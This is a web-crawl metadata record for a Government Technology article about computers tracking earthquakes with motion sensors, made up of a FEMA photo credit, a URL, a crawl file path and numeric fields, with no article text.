[Photo courtesy of Adam DuBrowa/FEMA.] | <urn:uuid:a7ca01b9-960d-4465-af58-503e2f0f266d> | CC-MAIN-2017-04 | http://www.govtech.com/em/disaster/Computers-Track-Earthquakes-Motion-Sensors.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00390-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955933 | 1,292 | 3.34375 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.